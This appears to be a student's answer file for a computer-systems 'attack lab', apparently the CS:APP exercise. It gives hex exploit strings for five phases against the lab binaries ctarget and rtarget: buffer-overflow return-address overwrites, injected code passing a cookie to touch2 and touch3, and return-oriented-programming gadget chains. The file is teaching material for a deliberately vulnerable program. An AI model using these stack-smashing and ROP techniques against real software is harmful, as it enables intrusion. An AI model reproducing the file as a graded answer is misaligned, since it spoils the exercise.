Ctarget
phase 1
01 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
a0 14 40 00 00 00 00 00
^A^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^T@^@^@^@^@^@

phase 2
68 ce 14 40 00 bf 73 01     /* pushq  $0x4014ce Touch2 add*/
96 78 c3 00 00 00 00 00     /* mov    $0x78960173,%edi cookie */
00 00 00 00 00 00 00 00
38 d6 60 55 00 00 00 00
0:	68 ce 14 40 00       	pushq  $0x4014ce
5:	bf 73 01 96 78       	mov    $0x78960173,%edi
a:	c3                   	retq 
hÎ^T@^@¿s^A<96>xÃ^@^@^@^@^@^@^@^@^@^@^@^@^@8Ö`U^@^@^@^@

phase 3
68 e5 15 40 00 48 c7 c7     /* pushq  $0x4015e5 Touch3 addr */
58 d6 60 55 c3 00 00 00     /* mov    $0x5560d638,%rdi */
00 00 00 00 00 00 00 00
38 d6 60 55 00 00 00 00
37 38 39 36 30 31 37 33 00   /* cookie in hex with null*/
0:	68 e5 15 40 00       	pushq  $0x4015e5
5:	48 c7 c7 38 d6 60 55 	mov    $0x5560d638,%rdi
c:	c3                   	retq 
hå^U@^@HÇÇXÖ`UÃ^@^@^@^@^@^@^@^@^@^@^@8Ö`U^@^@^@^@78960173^@

Rtarget
Phase 4
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
8a 16 40 00 00 00 00 00    /* pop rax func addr */
73 01 96 78 00 00 00 00    /* cookie backward */
97 16 40 00 00 00 00 00    /* mov rax into rdi addr w/ ret */
ce 14 40 00 00 00 00 00    /* touch2 address
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><8a>^V@^@^@^@^@^@s^A<96>x^@^@^@^@<97>^V@^@^@^@^@^@Î^T@^@^@^@^@^@

phase 5
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  /* end buffer */
2f 17 40 00 00 00 00 00  /* move rsp into rax 4889e0c3 */
97 16 40 00 00 00 00 00  /* move rax into rdi 4889c7c3 */
8a 16 40 00 00 00 00 00  /* pop rax func addr 58909090c3 */
48 00 00 00 00 00 00 00  /* constant to add to rsp address */
f4 16 40 00 00 00 00 00  /* move eax to edx 89c218dbc3 */
60 17 40 00 00 00 00 00  /* move edx to ecx 89d19090c3 */
21 17 40 00 00 00 00 00  /* move ecx to esi 89ce90c3 */
c4 16 40 00 00 00 00 00  /* rsi+rdi into rax 488d0437 */
97 16 40 00 00 00 00 00  /* move rax to rdi */
e5 15 40 00 00 00 00 00  /* address of touch 3 */
37 38 39 36 30 31 37 33 00  /* cookie in hex */
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@/^W@^@^@^@^@^@<97>^V@^@^@^@^@^@<8a>^V@^@^@^@^@^@H^@^@^@^@^@^@^@ô^V@^@^@^@^@^@`^W@^@^@^@^@^@!^W@^@^@^@^@^@Ä^V@^@^@^@^@^@<97>^V@^@^@^@^@^@å^U@^@^@^@^@^@78960173^@
